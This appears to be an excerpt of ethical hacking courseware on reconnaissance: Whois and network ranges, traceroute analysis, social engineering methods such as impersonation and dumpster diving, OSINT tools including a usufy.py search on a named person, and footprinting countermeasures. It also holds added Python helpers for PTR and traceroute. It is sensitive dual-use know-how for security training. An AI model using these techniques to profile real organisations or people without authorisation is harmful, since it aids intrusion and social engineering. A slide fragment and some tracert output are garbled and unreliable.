Source: https://www.yougetsignal.com
As shown in the screenshot, a reverse IP domain check takes a domain name or IP address pointing to a web server and searches for other sites known to be hosted on the same web server.

Figure 2.64: Screenshot of Reverse IP Domain Check
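How a reverse lookup over a first-last range is actually formed, as an added example written for this page (not code from the CEH courseware, DNSRecon or yougetsignal.com): the PTR names are derived from the address (in-addr.arpa for IPv4, ip6.arpa for IPv6), and a listing in the shape of the DNSRecon screenshot is parsed and grouped by hosting provider. The range syntax and the 162.241.216.x addresses come from the page; the listing itself is constructed, and resolve_ptr() is the only function that touches the network.

```python
"""Reverse DNS (PTR) lookup helpers.

Added example for this page; not code from the CEH courseware or from
DNSRecon. A reverse lookup asks the DNS for the PTR record at a name derived
from the address (in-addr.arpa for IPv4, ip6.arpa for IPv6). The functions
below build those names for a first-last range like the one given to
`dnsrecon -r`, and parse a CONSTRUCTED result listing modelled on the
screenshot to see which hosting providers own the names.
"""
import ipaddress
import socket
from collections import defaultdict

MAX_RANGE = 65536  # refuse to expand absurdly large ranges into memory


def ptr_names_for_range(first_last: str) -> list:
    """'162.241.216.0-162.241.216.255' -> list of reverse-pointer names to query."""
    first, last = (ipaddress.ip_address(p.strip()) for p in first_last.split("-"))
    if int(last) - int(first) + 1 > MAX_RANGE:
        raise ValueError("range too large for a single expansion")
    names = []
    for net in ipaddress.summarize_address_range(first, last):
        for addr in net:          # iterating a network yields every address in it
            names.append(addr.reverse_pointer)
    return names


def resolve_ptr(ip: str):
    """Live lookup of one PTR record (not exercised offline)."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except socket.herror:
        return None


# Constructed listing in the 'PTR <name> <address>' shape of Figure 2.63.
SAMPLE_LISTING = """\
PTR 162-241-216-5.unifiedlayer.com 162.241.216.5
PTR 162-241-216-3.unifiedlayer.com 162.241.216.3
PTR box5331.bluehost.com 162.241.216.11
PTR box5334.bluehost.com 162.241.216.14
PTR 162-241-216-13.unifiedlayer.com 162.241.216.13
"""


def parse_listing(text: str) -> dict:
    """Map address -> PTR name, skipping lines that are not PTR results."""
    mapping = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[0] == "PTR":
            _, name, addr = parts
            mapping[str(ipaddress.ip_address(addr))] = name.lower()
    return mapping


def group_by_provider(mapping: dict) -> dict:
    """Group addresses by the registrable domain of their PTR name (last two labels)."""
    groups = defaultdict(list)
    for addr, name in mapping.items():
        provider = ".".join(name.rstrip(".").split(".")[-2:])
        groups[provider].append(addr)
    return {p: sorted(a, key=ipaddress.ip_address) for p, a in groups.items()}
```

group_by_provider() gives the "which hosting company owns this block" view that the screenshot shows at a glance. PTR names are set by whoever controls the reverse zone, so treat them as hints about the provider, not as proof of which customer runs a host.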
Locate the Network Range

Network Footprinting
The next step after retrieving the DNS information is gathering network-related information. We will now discuss network footprinting, a method of gathering the footprint of the target organization's network. This section describes how to locate the network range, traceroute analysis, and traceroute tools.

Locate the Network Range
One needs to gather basic and important information about the target organization, such as what the organization does, who works there, and what type of work they do, to perform network footprinting. The answers to these questions provide information about the internal structure of the target network.

After gathering the information, an attacker can proceed to find the network range of a target system. Detailed information is available from the appropriate regional registry database regarding IP allocation and the nature of the allocation. An attacker can also determine the subnet mask of the domain and trace the route between the system and the target system. Traceroute tools that are widely used include Path Analyzer Pro and VisualRoute.

Obtaining private IP addresses can be useful to attackers. The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private internets: 10.0.0.0-10.255.255.255 (10/8 prefix), 172.16.0.0-172.31.255.255 (172.16/12 prefix), and 192.168.0.0-192.168.255.255 (192.168/16 prefix).

Using the network range, the attacker can get information about how the network is structured and which machines in the networks are alive. Using the network range also helps to identify the network topology, access control device, and OS used in the target network. To find the network range of the target network, one needs to enter the server IP address (that was gathered in Whois footprinting) in the ARIN Whois database search tool. A user can also visit the ARIN website (https://www.arin.net/about/welcome/region) and enter the server IP in the SEARCH Whois text box. This gives the network range of the target network. Improperly set up DNS servers offer attackers a good chance of obtaining a list of internal machines on the server. In addition, sometimes, if an attacker traces a route to a machine, it is possible to obtain the internal IP address of the gateway, which can be useful.

Figure 2.65: Screenshot of ARIN's Region

Figure 2.66: Screenshot showing result of ARIN Whois database search (Network Whois Record NET-207-46-0-0-1, queried from whois.arin.net with "207.46.232.182")

Attackers typically use more than one tool to obtain network information, as a single tool cannot provide all the required information.
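The private blocks and the network range lookup just described, as an added example written for this page (not code from the CEH courseware or from ARIN's tools): it checks an address against the three IANA private blocks quoted above, turns a Whois NetRange line into CIDR prefixes and a subnet mask, and flags private addresses that appear in a traceroute path, which is the "internal IP address of the gateway" the text mentions. The 207.46.x.x and 10.10.10.2 values are taken from this page; the NetRange line and the hop list are constructed around them.

```python
"""Network range and private address checks.

Added example for this page; not code from the CEH courseware. It uses the
three IANA private blocks quoted in the text, converts a Whois NetRange line
into CIDR prefixes and a subnet mask, and flags private addresses that show up
in a traceroute path (an internal gateway leaking into the public route).
Sample values are CONSTRUCTED except the addresses quoted from the text.
"""
import ipaddress

# The blocks the text lists (RFC 1918), as ipaddress networks
PRIVATE_BLOCKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def private_block(addr: str):
    """Return the private block containing addr, or None if it is not in one."""
    ip = ipaddress.ip_address(addr)
    for block in PRIVATE_BLOCKS:
        if ip in block:
            return str(block)
    return None


def netrange_to_cidrs(netrange: str) -> list:
    """'207.46.0.0 - 207.46.255.255' (ARIN NetRange form) -> ['207.46.0.0/16'].

    A range that is not prefix-aligned yields several prefixes.
    """
    first, last = (ipaddress.ip_address(p.strip()) for p in netrange.split("-"))
    return [str(net) for net in ipaddress.summarize_address_range(first, last)]


def subnet_mask(cidr: str) -> str:
    """Dotted-quad mask for a prefix, e.g. /16 -> 255.255.0.0."""
    return str(ipaddress.ip_network(cidr).netmask)


def address_count(netrange: str) -> int:
    """How many addresses the registry allocated to the range."""
    return sum(ipaddress.ip_network(c).num_addresses for c in netrange_to_cidrs(netrange))


def in_netrange(addr: str, netrange: str) -> bool:
    """True if a host found elsewhere (DNS, Whois) belongs to this allocation."""
    ip = ipaddress.ip_address(addr)
    return any(ip in ipaddress.ip_network(c) for c in netrange_to_cidrs(netrange))


def internal_hops(hops: list) -> list:
    """Hops from a traceroute that sit in private space; the first one is
    typically the gateway of the network the probe left from. '*' marks a
    hop that did not answer and is skipped."""
    return [h for h in hops if h != "*" and private_block(h) is not None]
```

in_netrange() is the check to run over every address collected in the earlier DNS and Whois steps: hosts outside the organization's allocation are usually hosted elsewhere (a CDN or a cloud provider) and belong to a different owner's scope.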
Traceroute

Traceroute
Finding the route of the target host on the network is necessary to test against man-in-the-middle attacks and other related attacks. Most operating systems come with a Traceroute utility to perform this task. It traces the path or route through which the target host packets travel in the network. Traceroute uses the ICMP protocol concept and the Time to Live (TTL) field of the IP header to find the path of the target host in the network.

The Traceroute utility can detail the path through which IP packets travel between two systems. The utility can trace the number of routers the packets travel through, the round-trip time (duration in transiting between two routers), and, if the routers have DNS entries, the names of the routers and their network affiliation. It can also trace geographic locations. It works by exploiting a feature of the Internet Protocol called TTL. The TTL field indicates the maximum number of routers a packet may traverse. Each router that handles a packet decrements the TTL count field in the IP header by one. When the count reaches zero, the router discards the packet and transmits an ICMP error message to the originator of the packet.

Figure 2.67: Illustration of Traceroute

The utility records the IP address and DNS name of the router in the path, and sends out another packet with a TTL value of two. This packet makes it through the first router and then times out at the next router in the path. This second router also sends an error message back to the originating host. Traceroute continues to do this and records the IP address and name of each router until a packet finally reaches the target host or until it decides that the host is unreachable. In the process, it records the time taken for each packet to make a round trip to each router. Finally, when it reaches the destination, the normal ICMP ping response will be sent back to the sender. The utility helps to reveal the IP addresses of the intermediate hops in the route to the target host from the source.
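The TTL mechanism described above, as an added example written for this page (not code from the CEH courseware or from any traceroute implementation): a simulated path of routers that each decrement the TTL, with the router that drives it to zero answering an ICMP Time Exceeded and the destination answering an Echo Reply, driven by the same "TTL 1, then 2, then 3" loop the text describes. No packets are sent. The addresses reused here are from the tracert output quoted below; the choice of which router stays silent is constructed.

```python
"""Traceroute's TTL mechanism as a simulation.

Added example for this page; it is not code from the CEH courseware or from
any traceroute implementation, and it sends no packets. SimulatedNetwork
stands in for the routers on the path: each one decrements the TTL and the one
that drives it to zero answers with an ICMP Time Exceeded, while the
destination answers an Echo Reply. The addresses come from the tracert output
quoted in the text; which hop stays silent is a CONSTRUCTED choice.
"""


class SimulatedNetwork:
    def __init__(self, routers, destination, silent=()):
        self.routers = list(routers)        # in path order, nearest first
        self.destination = destination
        self.silent = set(silent)           # routers configured not to send ICMP errors

    def send_probe(self, ttl):
        """Return the reply a probe with this TTL would provoke, or None if dropped silently."""
        remaining = ttl
        for router in self.routers:
            remaining -= 1                  # every router forwards with TTL - 1
            if remaining == 0:              # ... and discards the packet at zero
                if router in self.silent:
                    return None
                return ("time-exceeded", router)
        return ("echo-reply", self.destination)


def traceroute(net, max_hops=30):
    """Probe with TTL 1, 2, 3, ... and record who answered at each hop."""
    path = []
    reached = False
    for ttl in range(1, max_hops + 1):
        reply = net.send_probe(ttl)
        if reply is None:
            path.append("*")                # traceroute prints '*' for a timed-out probe
            continue
        kind, who = reply
        path.append(who)
        if kind == "echo-reply":            # the target itself answered: done
            reached = True
            break
    return {"hops": path, "reached": reached}


# Routers and destination taken from the tracert output in the text
EXAMPLE_NET = SimulatedNetwork(
    routers=["10.10.10.2", "1.6.15.234", "100.66.8.23"],
    destination="216.239.36.10",
    silent=["1.6.15.234"],                  # constructed: this hop blocks ICMP errors
)

if __name__ == "__main__":
    result = traceroute(EXAMPLE_NET)
    for number, hop in enumerate(result["hops"], start=1):
        print(f"{number:>2}  {hop}")
```

The silent hop reproduces what the next paragraphs call devices configured to block traceroute messages: the trace still advances past it, but that position shows only "*". Notice that the first hop is a private 10.x.x.x address, which is the internal gateway leak mentioned in the network range section.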
ICMP Traceroute
Windows operating system by default uses ICMP traceroute. Go to the command prompt and type the tracert command along with the destination IP address or domain name as follows:
C:\>tracert 216.239.36.10
Tracing route to ns3.google.com [216.239.36.10] over a maximum of 30 hops
li<im <i <1 10.10.10.2
20 ms 4 5 1.6.15.234
2ims 19 21 100.66.8.23
20ms 19 19 100.68.8.23
23ms 42 20 72.14.210,200
2ims 21 23 108.170.248.163
68ms 67 67 209.85.242.115
102 ms 102 209.85.247.194
100 ms 106 72.14.239.175
aiams 119 209.85.244.31
aiams 112 209.85.247.118
ai4ms 118 74.125.253.85
aii ms 112 ns3.google.com[216.239.36.10]
Trace complete
TCP Traceroute
Many network devices in any network are generally configured to block ICMP traceroute messages. In this scenario, an attacker uses TCP or UDP traceroute, which is also known as Layer 4 traceroute. Go to the terminal in the Linux operating system and type the tcptraceroute command along with the destination IP address or domain name as follows:
tcptraceroute www.google.com

Figure 2.68: Screenshot showing the output of TCP Traceroute

UDP Traceroute
Like Windows, Linux also has a built-in traceroute utility, but it uses the UDP protocol for tracing the route to the destination. Go to the terminal in the Linux operating system and type the traceroute command along with the destination IP address or domain name as follows:
traceroute www.google.com

Figure 2.69: Screenshot showing the output of UDP Traceroute
Traceroute Analysis

Traceroute Analysis
We have seen how the Traceroute utility helps to find the IP addresses of intermediate devices such as routers and firewalls present between a source and its destination. After running several traceroutes, an attacker will be able to find the location of a hop in the target network. Consider the following traceroute results obtained:
- traceroute 1.10.10.20, second to last hop is 1.10.10.1
- traceroute 1.10.20.10, third to last hop is 1.10.10.1
- traceroute 1.10.20.10, second to last hop is 1.10.10.50
- traceroute 1.10.20.15, third to last hop is 1.10.10.1
- traceroute 1.10.20.15, second to last hop is 1.10.10.50
By analyzing these results, an attacker can draw the network topology diagram of the target network, as shown below.

Figure 2.70: Traceroute Analysis
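The inference the figure draws by hand, as an added example written for this page (not code from the CEH courseware): the five observations listed above are parsed, each "Nth to last hop" claim places a router at a known distance before a target, consecutive positions become parent-child links, and the links are joined into the tree the diagram shows. The addresses are the ones on the page; the parsing pattern and the output format are this example's own.

```python
"""Infer a network topology from several traceroute observations.

Added example for this page; not code from the CEH courseware. The five
observations below are the ones the text lists. Each 'Nth to last hop' claim
places a router at a known distance before a target, so consecutive positions
give parent-child links that can be joined into a tree.
"""
import re
from collections import defaultdict

OBSERVATIONS = [
    "traceroute 1.10.10.20, second to last hop is 1.10.10.1",
    "traceroute 1.10.20.10, third to last hop is 1.10.10.1",
    "traceroute 1.10.20.10, second to last hop is 1.10.10.50",
    "traceroute 1.10.20.15, third to last hop is 1.10.10.1",
    "traceroute 1.10.20.15, second to last hop is 1.10.10.50",
]

ORDINALS = {"second": 2, "third": 3, "fourth": 4, "fifth": 5}
PATTERN = re.compile(r"traceroute (\S+), (\w+) to last hop is (\S+)")


def parse_observations(lines):
    """target -> {position counted from the end: hop address}; position 1 is the target."""
    paths = defaultdict(dict)
    for line in lines:
        match = PATTERN.fullmatch(line.strip())
        if not match:
            raise ValueError(f"unrecognised observation: {line!r}")
        target, ordinal, hop = match.groups()
        paths[target][ORDINALS[ordinal]] = hop
        paths[target][1] = target
    return dict(paths)


def infer_parents(paths):
    """Link hops whose positions are consecutive; a gap means an unobserved hop in between."""
    parent = {}
    for hops in paths.values():
        for pos in sorted(hops):
            if pos + 1 in hops:
                upstream = hops[pos + 1]
                seen = parent.setdefault(hops[pos], upstream)
                if seen != upstream:   # two traces disagree: the hop has more than one path in
                    raise ValueError(f"conflicting parents for {hops[pos]}: {seen} vs {upstream}")
    return parent


def children_of(parent, node):
    return sorted(child for child, up in parent.items() if up == node)


def render_tree(parent):
    """Text view of the inferred topology, roots first, one level of indent per hop."""
    roots = sorted(set(parent.values()) - set(parent))
    lines = []

    def walk(node, depth):
        lines.append("  " * depth + node)
        for child in children_of(parent, node):
            walk(child, depth + 1)

    for root in roots:
        walk(root, 0)
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_tree(infer_parents(parse_observations(OBSERVATIONS))))
```

Only consecutive positions are linked, so an observation that names the third-to-last hop without the second-to-last one leaves a gap rather than inventing a direct link; the conflict check catches the case where two traces to the same host enter it through different routers, which is a sign of multiple paths rather than a simple tree.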
Traceroute Tools

Traceroute Tools
Traceroute tools such as Path Analyzer Pro, VisualRoute, Traceroute NG, and PingPlotter are useful for extracting information about the geographical location of routers, servers, and IP devices in a network. Such tools help us to trace, identify, and monitor the network activity on a world map. Some of the features of these tools are as follows:
- Hop-by-hop traceroutes
- Ping plotting
- Reverse tracing
- Historical analysis
- Port probing
- Detect network problems
- Packet loss reporting
- Performance metrics analysis
- Reverse DNS
- Network performance monitoring

- Path Analyzer Pro
Source: https://www.pathanalyzer.com
Path Analyzer Pro performs network route tracing with performance tests, DNS, Whois, and network resolution to investigate network issues. Attackers use Path Analyzer Pro to identify the route from the source to the destination systems graphically. As shown in the screenshot, this tool helps attackers to gather information such as the hop number, its IP address, hostname, ASN, network name, percentage loss, latency, average latency, and standard deviation for each hop in the path.

Figure 2.71: Screenshot of Path Analyzer Pro

- VisualRoute
Source: http://www.visualroute.com
VisualRoute is a traceroute and network diagnostic tool. Attackers use VisualRoute to identify the geographical location of routers, servers, and other IP devices in the target network. This tool helps attackers in tracking the path between the source and destination systems and obtaining the results in a graphical format. As shown in the screenshot, using the VisualRoute tool enables attackers to gather information such as hop number, IP address, node name, and geographical location of each hop in the route.

Figure 2.72: Screenshot of VisualRoute
Footprinting through Social Engineering

Footprinting through Social Engineering
So far, we have discussed the different techniques for gathering information using online resources or tools. Now, we will discuss footprinting through social engineering, i.e., the art of obtaining information from people by exploiting their weaknesses. This section covers the concept as well as the techniques used to gather information through social engineering.

Social engineering is a non-technical process in which an attacker misleads a person into providing confidential information inadvertently. In other words, the target is unaware of the fact that someone is stealing confidential information. The attacker takes advantage of the gullible nature of people and their willingness to provide confidential information. To perform social engineering, an attacker first needs to gain the confidence of an authorized user and then mislead that user into revealing confidential information. The goal of social engineering is to obtain the required confidential information and then use that information for malicious purposes such as gaining unauthorized access to the system, identity theft, industrial espionage, network intrusion, fraud, and so on. The information obtained through social engineering may include credit card details, social security numbers, usernames and passwords, other personal information, security products in use, OS and software versions, IP addresses, names of servers, network layout information, and so on.

Social engineering can be performed in many ways, such as eavesdropping, shoulder surfing, dumpster diving, tailgating, impersonation, third-party authorization, piggybacking, reverse social engineering, and so on.
Collecting Information Using Eavesdropping, Shoulder Surfing, Dumpster Diving, and Impersonation
Eavesdropping, shoulder surfing, dumpster diving, and impersonation are social engineering techniques that are widely used to collect information from people.

Eavesdropping
Eavesdropping is the act of secretly listening to the conversations of people over a phone or video conference without their consent. It also includes reading confidential messages from communication media, such as instant messaging or fax transmissions. It is the act of intercepting communication in any form such as audio, video, or text without the consent of the communicating parties. The attacker gains information by tapping phone conversations or intercepting audio, video, or written communication.

Shoulder Surfing
Shoulder surfing is a technique whereby attackers secretly observe the target to gain critical information. In the shoulder surfing technique, an attacker stands behind the victim and secretly observes the victim's activities on the computer, such as keystrokes while entering usernames, passwords, and so on. The technique is effective in gaining passwords, personal identification numbers, security codes, account numbers, credit card information, and similar data. Attackers can easily perform shoulder surfing in a crowded place, as it is relatively easy to stand behind and watch the victim without his or her knowledge.

Dumpster Diving
This uncouth technique, also known as trashing, involves the attacker rummaging for information in garbage bins. The attacker may gain vital information such as phone bills, contact information, financial information, operations-related information, printouts of source codes, printouts of sensitive information, and so on from the target company's trash bins, printer waste bins, sticky notes at users' desks, and so on. The attacker may also gather account information from ATM trash bins. The information can help the attacker to commit attacks.

Impersonation
Impersonation is a technique whereby an attacker pretends to be a legitimate or authorized person. Attackers perform impersonation attacks personally or use phones or other communication media to mislead targets and trick them into revealing information. The attacker might impersonate a courier/delivery person, janitor, businessman, client, technician, or he/she may pretend to be a visitor. Using this technique, an attacker gathers sensitive information by scanning terminals for passwords, searching important documents on desks, rummaging bins, and so on. The attacker may even try to overhear confidential conversations and "shoulder surf" to obtain sensitive information.
Module Flow
- Footprinting Concepts
- Footprinting Tools
- Footprinting Countermeasures

Footprinting Tools
Various tools help attackers in footprinting. Many organizations offer tools that make information gathering an easy task. This section describes tools intended for obtaining information from various sources.

Footprinting tools are used to collect basic information about target systems to exploit them. Information collected by the footprinting tools includes the target's IP location information, routing information, business information, address, phone number and social security number, details about the source of an email and a file, DNS information, and so on.

- Maltego
Source: https://www.paterva.com
Maltego is a program that can be used to determine relationships and real-world links between people, groups of people, organizations, websites, Internet infrastructure, documents, etc. Attackers can use different entities available in the tool to obtain information such as email addresses, a list of phone numbers, and a target's Internet infrastructure (domains, DNS names, Netblocks, IP addresses information). As shown in the screenshot, attackers add a Person entity, rename it with the target's name, and obtain the email addresses associated with the target.

Figure 2.72: Screenshot of Maltego

- Recon-ng
Source: https://github.com
Recon-ng is a web reconnaissance framework with independent modules for database interaction that provides an environment in which open-source web-based reconnaissance can be conducted. As shown in the screenshot, attackers use the module recon/domains-hosts/hackertarget to extract a list of subdomains and IP addresses associated with the target URL. Attackers use this module to gather target information and obtain a list of subdomains and their IP addresses.

Figure 2.74: Screenshot of recon-ng

- FOCA
Source: https://www.elevenpaths.com
Fingerprinting Organizations with Collected Archives (FOCA) is a tool used mainly to find metadata and hidden information in the documents that it scans. FOCA is capable of scanning and analyzing a wide variety of documents, with the most common ones being Microsoft Office, OpenOffice, or PDF files.

Features:
- Web Search - Searches for hosts and domain names through URLs associated with the main domain. Each link is analyzed to extract information from its new host and domain names.
- DNS Search - Checks each domain to ascertain the hostnames configured in NS, MX, and SPF servers to discover the new host and domain names.
- IP Resolution - Resolves each hostname by comparison with the DNS to obtain the IP address associated with this server name. To perform this task accurately, the tool performs analysis against the organization's internal DNS.
- PTR Scanning - Finds more servers in the same segment of a determined address; FOCA executes a PTR log scan.
- Bing IP - Launches a search process for new domain names associated with that IP address for each IP address discovered.
- Common Names - Perform dictionary attacks against the DNS.

As shown in the screenshot, attackers search the target domain and obtain the file information stored in it. The extracted files can be viewed on the web browser. Further, the attackers can view additional information such as network domains, roles, vulnerabilities, and metadata of the target domain.

Figure 2.75: Screenshot of FOCA
- OSRFramework
Source: https://github.com
OSRFramework includes applications related to username checking, DNS lookups, information leaks research, deep web search, and regular expression extraction. The tools included in the OSRFramework package that attackers can use to gather information on the target are listed below:
- usufy.py - Checks for a user profile on up to 290 different platforms
- mailfy.py - Checks for the existence of a given email
- searchfy.py - Performs a query on the platforms in OSRFramework
- domainfy.py - Checks for the existence of domains
- phonefy.py - Checks for the existence of a given series of phones
- entify.py - Uses regular expressions to extract entities

As shown in the screenshot, attackers use the following command to search for a target user on social media platforms:
usufy.py -n Mark Zuckerberg -p twitter facebook youtube

Figure 2.76: Screenshot of OSRFramework
- OSINT Framework
Source: https://osintframework.com
OSINT Framework is an open source intelligence gathering framework that helps security professionals in performing automated footprinting and reconnaissance, OSINT research, and intelligence gathering. It is focused on gathering information from free tools or resources. This framework includes a simple web interface that lists various OSINT tools arranged by category, and it is shown as an OSINT tree structure on the web interface. As shown in the screenshot, the tools listed include the following indicators:
- (T) - Indicates a link to a tool that must be installed and run locally
- (D) - Google dork
- (R) - Requires registration
- (M) - Indicates a URL that contains the search term and the URL itself must be edited manually

- Recon-Dog
Source: https://www.github.com
Recon-Dog is an all-in-one tool for all basic information gathering needs. It uses APIs to collect information about the target system.
Features:
- Censys: Uses censys.io to gather a massive amount of information about an IP address
- NS lookup: Performs name server lookup
- Port scan: Scans most common TCP ports
- Detect CMS: Can detect 400+ content management systems
- Whois lookup: Performs a Whois lookup
- Detect honeypot: Uses shodan.io to check if the target is a honeypot
- Find subdomains: Uses findsubdomains.com to find subdomains
- Reverse IP lookup: Performs a reverse IP lookup to find domains associated with an IP address
- Detect technologies: Uses wappalyzer.com to detect 1000+ technologies
- All: Runs all utilities against the target

Figure 2.78: Screenshot of Recon-Dog

- BillCipher
Source: https://www.github.com
BillCipher is an information gathering tool for a website or IP address. It can work on any operating system that supports Python 2, Python 3, and Ruby. This tool includes various options such as DNS lookup, Whois lookup, port scanning, zone transfer, host finder, and reverse IP lookup, which help to gather critical information.

Figure 2.79: Screenshot of BillCipher

Some additional footprinting tools are listed below:
- theHarvester (http://www.edge-security.com)
- Th3inspector (https://github.com)
- Raccoon (https://github.com)
- Orb (https://github.com)
- PENTMENU (https://github.com)
Module Flow

ootprintingConcepts

Footprinting
Tools

Footprinting
Countermeasures

WB resin
employes
acess
netwoting
Stes network tosci tomtheonan’

wb
enter sete lmao leakage

Ooot
product
revit iomatonin presen reports clogs.

mun
Unithe noma pblihd on th weber

earch
Prevent
engines
web
page
romcaching
2 andse anonymous
registration
series

2
Module 222
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Countermeasures(Cont'd)
Footprinting

Countermeasures
Footprinting
So far, we have discussed the importance of footprinting, various ways to perform the task, and the tools that help in its execution. Now, we will discuss footprinting countermeasures, i.e., the measures or actions taken to prevent or offset information disclosure.

Some of the footprinting countermeasures are as follows:
- Restrict the employees' access to social networking sites from the organization's network
- Configure web servers to avoid information leakage
- Educate employees to use pseudonyms on blogs, groups, and forums
- Do not reveal critical information in press releases, annual reports, product catalogs, and so on
- Limit the amount of information that you are publishing on the website/Internet
- Use footprinting techniques to discover and remove any sensitive information that is publicly available
- Prevent search engines from caching a web page and use anonymous registration services
- Develop and enforce security policies such as an information security policy, password policy, and so on, to regulate the information that employees can reveal to third parties
- Set apart internal and external DNS or use split DNS, and restrict zone transfer to authorized servers
- Disable directory listings in the web servers

- Conduct security awareness training periodically to educate employees about various social engineering tricks and risks
- Opt for privacy services on the Whois lookup database
- Avoid domain-level cross-linking for critical assets
- Encrypt and password-protect sensitive information
- Do not enable protocols that are not required
- Always use TCP/IP and IPSec filters for defense in depth
- Configure IIS to avoid information disclosure through banner grabbing
- Hide the IP address and the related information by implementing a VPN or keeping the server behind a secure proxy
- Request archive.org to delete the history of the website from the archive database
- Keep the domain name profile private
- Place critical documents such as business plans and proprietary documents offline to prevent exploitation
- Train employees to thwart social engineering techniques and attacks
- Sanitize the details provided to the Internet registrars to hide the direct contact details of the organization
- Disable the geo-tagging functionality on cameras to prevent geolocation tracking
- Avoid revealing one's location or travel plans on social networking sites
- Turn off geolocation access on all mobile devices when not required
- Ensure that no critical information such as strategic plans, product information, and sales projections is displayed on notice boards or walls

Module Summary
This module presented footprinting concepts along with the objectives of footprinting. It provided a detailed explanation of the various techniques used for footprinting through search engines. Further, it described footprinting through web services and social networking sites. In addition, it discussed website footprinting and email footprinting techniques. It also explained Whois footprinting and DNS footprinting in detail. Moreover, it described network footprinting along with traceroute analysis. It also explained footprinting through social engineering. Finally, it presented an overview of important footprinting tools. The module ended with a detailed discussion of how organizations can defend themselves against footprinting and reconnaissance activities.

In the next module, we will discuss in detail how attackers as well as ethical hackers and pen testers perform network scanning to collect information about a target for evaluation before an attack or audit.

Module 03: Scanning Networks
Module Objectives
After identifying the target and performing the initial reconnaissance, as discussed in the Footprinting and Reconnaissance module, attackers begin to search for an entry point into the target system. Attackers should determine whether the target systems are active or inactive to reduce the time spent on scanning. Notably, the scanning itself is not the actual intrusion but an extended form of reconnaissance in which the attacker learns more about his/her target, including information about OSs, services, and any configuration lapses. The information gleaned from such reconnaissance helps the attacker select strategies for attacking the target system or network.

This module starts with an overview of network scanning and provides insights into various host discovery techniques that can be used to check for live and active systems. Furthermore, it discusses various port and service discovery techniques, operating system discovery techniques, and techniques for scanning beyond IDS and firewalls. Finally, it ends with an overview of drawing network diagrams.
At the end of this module, you will be able to:
- Describe the network scanning concepts
- Use various scanning tools
- Perform host discovery to check for live systems
- Perform port and service discovery using various scanning techniques
- Perform operating system (OS) discovery
- Scan beyond intrusion detection systems (IDS) and firewalls
- Draw network diagrams using network discovery tools

Module Flow

Network Scanning Concepts
As already discussed, footprinting is the first phase of hacking, in which the attacker gains primary information about a potential target. He/she then uses this information in the scanning phase to gather more details about the target.

Overview of Network Scanning

Scanning is the process of gathering additional detailed information about the target using highly complex and aggressive reconnaissance techniques. Network scanning refers to a set of procedures used for identifying hosts, ports, and services in a network. Network scanning is also used for discovering active machines in a network and identifying the OS running on the target machine. It is one of the most important phases of intelligence gathering for an attacker, which enables him/her to create a profile of the target organization. In the process of scanning, the attacker tries to gather information, including the specific IP addresses that can be accessed over the network, the target's OS and system architecture, and the ports along with their respective services running on each computer.

Figure 3.1: Network scanning process (the attacker sends TCP/IP probes to the network and gets network information back)

The purpose of scanning is to discover exploitable communication channels, probe as many listeners as possible, and track the ones that are responsive or useful to an attacker's particular needs. In the scanning phase of an attack, the attacker tries to find various ways to intrude into a target system. The attacker also tries to discover more information about the target system to determine the presence of any configuration lapses. The attacker then uses the information obtained to develop an attack strategy.

Types of Scanning
- Port Scanning: Lists the open ports and services. Port scanning is the process of checking the services running on the target computer by sending a sequence of messages in an attempt to break in. Port scanning involves connecting to or probing TCP and UDP ports of the target system to determine whether the services are running or are in a listening state. The listening state provides information about the OS and the application currently in use. Sometimes, active services that are listening may allow unauthorized users to misconfigure systems or to run software with vulnerabilities.
- Network Scanning: Lists the active hosts and IP addresses. Network scanning is a procedure for identifying active hosts on a network, either to attack them or to assess the security of the network.
- Vulnerability Scanning: Shows the presence of known weaknesses. Vulnerability scanning is a method for checking whether a system is exploitable by identifying its vulnerabilities. A vulnerability scanner consists of a scanning engine and a catalog. The catalog includes a list of common files with known vulnerabilities and common exploits for a range of servers. A vulnerability scanner may, for example, look for backup files or directory traversal exploits. The scanning engine maintains logic for reading the exploit list, transferring the request to the web server, and analyzing the requests to ensure the safety of the server. These tools generally target vulnerabilities that secure host configurations can fix easily through updated security patches and a clean web document.

A thief who wants to break into a house usually looks for access points such as doors and windows. These are usually the house's points of vulnerability, as they are easily accessible. When it comes to computer systems and networks, ports are the doors and windows of a system that an intruder uses to gain access. A general rule for computer systems is that the greater the number of open ports on a system, the more vulnerable is the system. However, there are cases in which a system with fewer open ports than another machine presents a much higher level of vulnerability.
Objectives of Network Scanning
The more the information at hand about a target organization, the higher are the chances of knowing a network's security loopholes and, consequently, of gaining unauthorized access to it.

Some objectives for scanning a network are as follows:
- Discover the network's live hosts, IP addresses, and open ports of the live hosts. Using the open ports, the attacker will determine the best means of entering into the system.
- Discover the OS and system architecture of the target. This is also known as fingerprinting. An attacker can formulate an attack strategy based on the OS's vulnerabilities.
- Discover the services running/listening on the target system. Doing so gives the attacker an indication of the vulnerabilities (based on the service) that can be exploited for gaining access to the target system.
- Identify specific applications or versions of a particular service.
- Identify vulnerabilities in any of the network systems. This helps an attacker to compromise the target system or network through various exploits.

TCPCommunicationFlags
The TCP header contains various flags that control the transmission of data across a TCP connection. Six TCP control flags manage the connection between hosts and give instructions to the system. Four of these flags (SYN, ACK, FIN, and RST) govern the establishment, maintenance, and termination of a connection. The other two flags (PSH and URG) provide instructions to the system. The size of each flag is 1 bit. As there are six flags in the TCP Flags section, the size of this section is 6 bits. When a flag value is set to "1," that flag is automatically turned on. Note that the header also carries the ECN-related CWR and ECE bits (RFC 3168) directly above these six, so packet dissectors commonly show eight flag bits; the six discussed here are the ones that matter for scanning.

Figure 3.2: TCP header format

Figure 3.3: TCP communication flags

The following are the TCP communication flags:
- Synchronize or "SYN": It notifies the transmission of a new sequence number. This flag generally represents the establishment of a connection (three-way handshake) between two hosts.
- Acknowledgement or "ACK": It confirms the receipt of the transmission and identifies the next expected sequence number. When the system successfully receives a packet, it sets the value of its flag to "1," thus implying that the receiver should pay attention to it.
- Push or "PSH": When it is set to "1," it indicates that the sender has raised the push operation to the receiver; this implies that the remote system should inform the receiving application about the buffered data coming from the sender. The system raises the PSH flag at the start and end of a data transfer and sets it on the last segment of a file to prevent buffer deadlocks.
- Urgent or "URG": It instructs the system to process the data contained in packets as soon as possible. When the system sets the flag to "1," priority is given to processing the urgent data first and all the other data processing is stopped.
